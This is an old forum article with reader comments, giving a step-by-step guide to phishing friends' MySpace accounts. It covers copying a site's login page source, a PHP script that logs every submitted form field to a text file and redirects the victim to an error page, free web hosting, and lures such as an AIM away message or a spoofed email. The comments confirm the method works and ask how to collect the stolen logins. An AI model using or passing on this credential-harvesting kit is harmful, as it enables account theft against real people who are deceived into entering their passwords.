Phishing: Hook, Line, and Sucker
Phishing: Hook, Line, and Sucker
Phishing
Hey everbody! :) This is my first article so I'm sorry if it's horrible.
What we're going to talk about today is phishing. So what exactly is phishing? Well, phishing is getting someone to click on a link to a fake login page that you have made, and getting them to enter their information. You can get them to do this by spoofing an e-mail or sending it to them in an instant message or something. I have tried to make each step as easy to follow as possible so anyone can do it.
-
Decide who and where you want to get into. When I did this myself, I was trying to get into all of my friend's MySpace accounts. Then go to the website you chose, right-click, and View Source.
-
Save the source as login.html. Then open Notepad and paste the following into it:
foreach($_POST as $variable => $value) { fwrite($handle, $variable); fwrite($handle, "="); fwrite($handle, $value); fwrite($handle, "\r\n"); } fwrite($handle, "\r\n"); fclose($handle); exit;
Save as data.txt
-
Register at a free webhosting place that will let you use php. (I used 100webspace.com) Then register at a place that won't display advertisements on your site. (I used 50webs.com) It would be a good idea to try to login to the website your making a fake of but with a bad password. Copy the link for the error page.
-
Get a program that will let you save as .php (I used EditPlus2 from http://www.editplus.com) Open the program then copy and paste the following:
<?php header("Location: someplace.html"); $handle = fopen("data.txt", "a"); foreach($_POST as $variable => $value) { fwrite($handle, $variable); fwrite($handle, "="); fwrite($handle, $value); fwrite($handle, "\r\n"); } fwrite($handle, "\r\n"); fclose($handle); exit; ?>
Now, look at the second line of code. Do you notice '("Location: someplace.html")'? Change someplace.html to the error page. Save as log.php
-
Upload data.txt and log.php at the site that will let you use php. (100webspace.com) Then open login.html in Notepad. Search for <form action="some file name"> Replace their file name with a link to your log.php. Save and then upload login.html.
-
Test out your new login page. Load your data.txt from your website(yoururl.hostdomain/data.txt) and it should have your test login listed. You can re-uplod data.txt to get rid of your test login information.
Ok now that you have your fake login page done you need to get the people there. The method I chose to do was to make the page different and tell people it was a secret login page. I put it in my away message on AIM and told them if they logged in at that page they would see something cool. Another way is to spoof an email.
Hopefully this is helpful to some people. If there are any problems message me.
Good Luck,
Phoenix Rising
ghost 18 years ago
Great article, maybe it won't work on myspace that much anymore, but you could use it for other sites.
ghost 17 years ago
How do I find out the information my friends input? can someone tell me how i possibly view it? or have it sent to me via email?
ghost 17 years ago
Believe me, it works on myspace. Most people don't think to check the url EVERY single time. So chances are that you'll get away with it.
ghost 17 years ago
great article, but just one thing. when i try and do a login with a fake password i dont get an error page on myspace.com. is this what you meant by patched grindordie?